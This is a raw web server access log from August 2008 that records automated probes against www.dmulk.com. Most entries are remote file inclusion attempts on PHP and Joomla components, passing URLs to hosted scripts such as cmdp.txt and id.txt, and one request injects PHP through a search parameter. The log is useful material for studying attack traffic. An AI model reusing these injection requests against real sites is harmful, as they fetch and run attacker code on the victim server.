62.87.154.41 - - [10/Aug/2008:12:26:15 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.65.228.5 - - [10/Aug/2008:12:26:40 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:26:42 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:26:42 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:26:42 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:26:43 -0700] "GET /logs/access_080315.log/joomla/index.php?option=com_restaurante&task=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.44.244.37 - - [10/Aug/2008:12:26:48 -0700] "GET /logs/index.php?sayfa=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
207.44.244.37 - - [10/Aug/2008:12:26:49 -0700] "GET /index.php?sayfa=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 200 18527 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:12:27:13 -0700] "GET /logs/access_080309.log//admin/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:12:27:16 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:12:27:19 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.65.228.5 - - [10/Aug/2008:12:27:20 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.11.24.250 - - [10/Aug/2008:12:27:57 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [10/Aug/2008:12:27:57 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.65.228.5 - - [10/Aug/2008:12:28:06 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:28:15 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:28:16 -0700] "GET /logs/access_080218.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:28:16 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.245.192.26 - - [10/Aug/2008:12:28:35 -0700] "GET /logs/access_080321.log//index.php?option=com_restaurante&task=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:12:28:36 -0700] "GET /logs/access_080212.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:28:38 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:28:38 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:28:38 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:12:28:38 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:28:39 -0700] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:28:39 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:28:40 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:12:28:40 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.157.174.146 - - [10/Aug/2008:12:28:42 -0700] "GET /logs/access_080118.log/index.php?url=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.245.192.26 - - [10/Aug/2008:12:28:43 -0700] "GET /logs/access_080315.log//index.php?option=com_restaurante&task=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.157.174.146 - - [10/Aug/2008:12:28:44 -0700] "GET /index.php?url=http://www.topyn.com/bajo.txt?? HTTP/1.1" 200 18379 "-" "libwww-perl/5.803" "www.dmulk.com"
213.157.174.146 - - [10/Aug/2008:12:28:45 -0700] "GET /logs/index.php?url=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:12:28:55 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:12:29:05 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:29:10 -0700] "GET /logs/access_080315.log/joomla/index.php?option=com_restaurante&task=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:29:18 -0700] "GET /logs/access_080203.log/joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:29:34 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:12:29:39 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:12:29:42 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:12:29:44 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:12:29:49 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:12:29:57 -0700] "GET /logs/access_080309.log//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:12:30:34 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.22.2 - - [10/Aug/2008:12:30:38 -0700] "GET /logs/?sourcedir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 200 59997 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
74.54.22.2 - - [10/Aug/2008:12:30:38 -0700] "GET /?sourcedir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 200 18413 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
58.65.228.5 - - [10/Aug/2008:12:30:47 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.85.102.100 - - [10/Aug/2008:12:30:48 -0700] "GET /logs/?sourcedir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 200 59997 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:30:48 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://robinh01.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:30:48 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://robinh01.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:30:48 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://robinh01.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.102.100 - - [10/Aug/2008:12:30:48 -0700] "GET /?sourcedir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 200 18413 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
70.85.102.132 - - [10/Aug/2008:12:31:45 -0700] "GET /logs/?sourcedir=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 200 59997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
70.85.102.132 - - [10/Aug/2008:12:31:45 -0700] "GET /?sourcedir=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 200 18411 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:12:31:56 -0700] "GET //admin/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:12:32:13 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:12:32:15 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:12:32:15 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:12:32:23 -0700] "GET /logs/access_080315.log/joomla/index.php?option=com_restaurante&task=http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:33:27 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:33:27 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:33:27 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.249.70.58 - - [10/Aug/2008:12:33:47 -0700] "GET /logs/access_071025.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:12:34:15 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:12:34:16 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:12:34:16 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:34:23 -0700] "GET /logs/access.log//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:34:25 -0700] "GET //index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:34:26 -0700] "GET /logs//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:34:26 -0700] "GET /logs/access.log//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:34:27 -0700] "GET //index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:34:27 -0700] "GET /logs//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:34:37 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:34:38 -0700] "GET /logs/access_080218.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:34:39 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.5.163.212 - - [10/Aug/2008:12:34:45 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
195.5.163.212 - - [10/Aug/2008:12:34:45 -0700] "GET /errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:34:50 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:34:50 -0700] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:34:50 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:34:58 -0700] "GET /logs/access_080203.log/joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.102.100 - - [10/Aug/2008:12:34:59 -0700] "GET /errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
70.85.102.100 - - [10/Aug/2008:12:34:59 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
194.79.75.195 - - [10/Aug/2008:12:35:12 -0700] "GET /errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.79.75.195 - - [10/Aug/2008:12:35:12 -0700] "GET /logs/errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:35:19 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [10/Aug/2008:12:35:24 -0700] "GET /logs/errors.php?error=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
194.79.75.195 - - [10/Aug/2008:12:35:24 -0700] "GET /errors.php?error=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:12:35:28 -0700] "GET /logs/administrator/components/com_joomlaradiov5/errors.php?error=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:12:35:30 -0700] "GET /administrator/components/com_joomlaradiov5/errors.php?error=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:12:35:31 -0700] "GET /logs/administrator/components/com_joomlaradiov5/errors.php?error=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:12:35:32 -0700] "GET /administrator/components/com_joomlaradiov5/errors.php?error=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:35:44 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:35:44 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:35:45 -0700] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:35:45 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:35:47 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:36:10 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:36:12 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:36:12 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:36:12 -0700] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:36:14 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:36:14 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:36:14 -0700] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:36:14 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:36:59 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:36:59 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:37:00 -0700] "GET /logs/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
195.5.163.212 - - [10/Aug/2008:12:38:47 -0700] "GET /errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:12:38:49 -0700] "GET //ashnews.php?pathtoashnews=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:12:38:49 -0700] "GET /logs//ashnews.php?pathtoashnews=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:12:38:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:38:51 -0700] "GET /logs/access.log//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
